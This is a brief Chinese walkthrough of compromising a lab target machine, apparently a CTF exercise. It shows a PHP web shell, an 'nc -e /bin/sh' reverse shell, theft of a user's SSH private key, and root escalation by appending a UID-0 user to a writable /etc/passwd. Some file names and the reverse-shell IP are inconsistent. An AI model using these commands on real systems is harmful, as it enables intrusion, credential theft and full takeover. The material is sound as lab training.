查看靶机的mac地址
使用kail进行扫描ip
发现开放了三个端口
访问ip
查看页面源代码
发现了账号和密码
使用获得的账号和密码在kail连接ftp
ls看一眼 只发现了一个log.php文件
将该文件下载在本地
get backup_log.php
下载下来之后 cat一下该文件
暴力破解一下目录
发现一个/logs 访问一下
发现访问不到
需要调整10001端口
nc -nv 192.168.2.120 10001
需要一直连 多尝试
我们得到了一个空白的shell 写入一句话木马
<?php system($_GET['cmd']) ?>
然后去浏览器中在url中输入
http://192.168.2.120/logs/backup_login.php?cmd=whoami
现在尝试使用netact在本地机器上获取反向shell
http://192.168.2.120/logs/backup_log.php?cmd=nc -e /bin/sh 192.168.2.120 9999
同时在kail上启动netcat 获取生成的shell
反弹成功
建立交互式的shell:
python -c 'import pty; pty.spawn("/bin/sh")'
提权
cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys #发现是hbeale用户
查看密钥文件
cat id_rsa
查看/etc/passwd文件验证,发现确实存在hbeale用户:
cat /etc/passwd
尝试用密钥文件登录:
ssh -i id_rsa hbeale@192.168.2.120
登陆成功
但是是低权限用户
利用不安全配置/etc/passwd可写进行提权:
创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd
echo 'newuser:$1$dY7ecSy3$DuiqIJfj/66qr4GMayq1O/:0:0:root:/root:/bin/bash' >> /etc/passwd
su切换newuser用户